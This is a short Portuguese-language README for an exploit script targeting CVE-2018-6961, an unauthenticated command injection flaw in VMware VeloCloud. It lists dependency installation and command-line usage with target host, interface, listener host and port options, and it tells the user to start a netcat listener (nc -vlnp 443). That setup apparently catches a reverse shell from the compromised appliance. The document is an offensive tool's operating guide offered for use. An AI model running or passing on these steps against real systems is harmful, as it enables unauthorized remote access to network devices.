
veloCloud VMWare - Vulnerabilidade
CVE-2018-6961 - VULNERABILIDADE DE INJEÇÃO DE COMANDO NÃO AUTENTICADA
Este exploit funciona em Python2.7 - Não testado em outras versões
1) Instalar Dependências
pip install request
se não tiver pip instalado, execute
apt-get install python-pip
**2) Uso **
python exployt.py --rhost --interface --lhost --lport --function
python exploit.py --rhost 1.1.1.1 --interface ge1 --lhost 2.2.2.2 --lport 443 --function traceroute
Exploiting...................
3) Não se esqueça de configurar o netcat em outro terminal
nc -vlnp 443
TODO --melhorar o script para executar o netcat no mesmo terminal